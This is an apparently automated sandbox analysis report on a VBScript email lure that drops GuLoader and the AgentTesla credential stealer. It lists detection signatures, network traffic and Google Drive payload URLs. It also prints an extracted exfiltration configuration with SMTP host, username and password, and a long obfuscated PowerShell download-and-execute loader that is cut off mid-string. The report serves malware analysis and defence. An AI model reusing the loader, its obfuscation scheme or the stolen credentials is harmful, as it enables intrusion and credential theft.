Windows Analysis Report
Arrival Notice PUS_pdf.vbs

Overview

General Information

Sample name: Arrival Notice PUS_pdf.vbs
Analysis ID: 1427934
MD5: addc13066aacdb6cdb21ae368bce83d2
SHA1: d4d509e48e946e01605df86bfebf8f4cbc4648f7
SHA256: 9c8fb0ee8d5a21346a7e25567abd4155c543d90a213a40d79269d1c4d3b269be
Tags: Formbookvbs
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Potential malicious VBS script found (suspicious strings)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
 https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Found malware configuration
Source: wscript.exe.7468.1.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.myhydropowered.com", "Username": "africa@myhydropowered.com", "Password": "q5NHtWyc5WKhunX"}
Multi AV Scanner detection for domain / URL
Source: mail.myhydropowered.com Virustotal: Detection: 5% Perma Link
Multi AV Scanner detection for submitted file
Source: Arrival Notice PUS_pdf.vbs ReversingLabs: Detection: 13%
Source: Arrival Notice PUS_pdf.vbs Virustotal: Detection: 15% Perma Link
Source: unknown HTTPS traffic detected: 142.251.15.139:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.105.132:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.15.139:443 -> 192.168.2.9:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.105.132:443 -> 192.168.2.9:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.9:49715 version: TLS 1.2
Source: Binary string: qm.Core.pdb source: powershell.exe, 00000009.00000002.2010987312.0000000007872000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000009.00000002.2010987312.0000000007807000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000009.00000002.2003068899.0000000003320000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View IP Address: 104.26.13.205 104.26.13.205
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: ip-api.com
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1nQic9drH1PbiJHqocgcGVmSGhgio27Iy&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: powershell.exe, 00000009.00000002.2003068899.00000000032BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: wscript.exe, 00000001.00000003.1345209659.00000171D0371000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/
Source: wscript.exe, 00000001.00000003.1462009599.00000171CE2FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1463253642.00000171CE389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000001.00000003.1462009599.00000171CE2FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1463253642.00000171CE389000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1346641389.00000171D0334000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1346068233.00000171D030C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1463388260.00000171D0280000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000001.00000003.1346068233.00000171D030C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?11a65f450b971
Source: wscript.exe, 00000001.00000003.1346468271.00000171D02E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1346289034.00000171D02C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?11a65f450b
Source: powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000003.00000002.2266575309.00000189233D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2266575309.00000189215F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2266575309.00000189215F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.2266575309.0000018923399000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000003.00000002.2266575309.0000018922EAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921817000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000003.00000002.2266575309.0000018921817000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DRP
Source: powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DRXR
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1olG4R0HLjL50hYvDusE_ST-CKhKIr-DR&export=download
Source: powershell.exe, 00000003.00000002.2266575309.0000018921A7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.comhP
Source: powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2266575309.0000018922882000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown HTTPS traffic detected: 142.251.15.139:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.105.132:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.15.139:443 -> 192.168.2.9:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.105.132:443 -> 192.168.2.9:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.9:49715 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_8108.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Unperiphrased.ShellExecute Coinsurable,maengdebegreb,"","" ,Allness139
Sample has a suspicious name (potential lure to open the executable)
Source: Arrival Notice PUS_pdf.vbs Static file information: Suspicious name
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6253
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6253
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6253 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6253 Jump to behavior
Writes or reads registry keys via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e 